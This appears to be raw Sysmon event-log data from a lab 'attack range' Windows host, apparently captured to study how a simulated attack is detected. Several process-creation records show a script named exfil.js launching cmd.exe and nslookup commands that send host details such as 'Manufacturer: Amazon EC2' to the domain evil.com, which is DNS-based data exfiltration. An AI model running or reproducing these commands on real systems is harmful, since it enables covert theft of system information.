14:16:10.910{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.910{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.910{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.910{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.910{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-443E-000000005F02}4052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.910{2E1864BB-17AA-629A-423E-000000005F02}75764036C:\Windows\system32\cmd.exe{2E1864BB-17AA-629A-443E-000000005F02}4052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.915{2E1864BB-17AA-629A-443E-000000005F02}4052C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AA-629A-423E-000000005F02}7576C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyamrcz.tmp 2>&1 10341000x8000000000000000195421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.873{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-433E-000000005F02}6716C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.873{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-433E-000000005F02}6716C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.873{2E1864BB-17AA-629A-433E-000000005F02}67165624C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-423E-000000005F02}7576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.857{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-433E-000000005F02}6716C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.842{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.842{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.842{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.842{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.842{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-423E-000000005F02}7576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.842{2E1864BB-17A1-629A-783D-000000005F02}55527760C:\Windows\System32\WScript.exe{2E1864BB-17AA-629A-423E-000000005F02}7576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.854{2E1864BB-17AA-629A-423E-000000005F02}7576C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyamrcz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.842{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltolcgj.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.810{2E1864BB-17AA-629A-403E-000000005F02}48647792C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-413E-000000005F02}7312C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.810{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.810{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.810{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.810{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.810{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-413E-000000005F02}7312C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.810{2E1864BB-17AA-629A-3F3E-000000005F02}80121696C:\Windows\system32\cmd.exe{2E1864BB-17AA-629A-413E-000000005F02}7312C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.820{2E1864BB-17AA-629A-413E-000000005F02}7312C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AA-629A-3F3E-000000005F02}8012C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltolcgj.tmp 2>&1 10341000x8000000000000000195401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.789{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-403E-000000005F02}4864C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.789{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-403E-000000005F02}4864C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.774{2E1864BB-17AA-629A-403E-000000005F02}48647792C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-3F3E-000000005F02}8012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.758{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-403E-000000005F02}4864C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.742{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 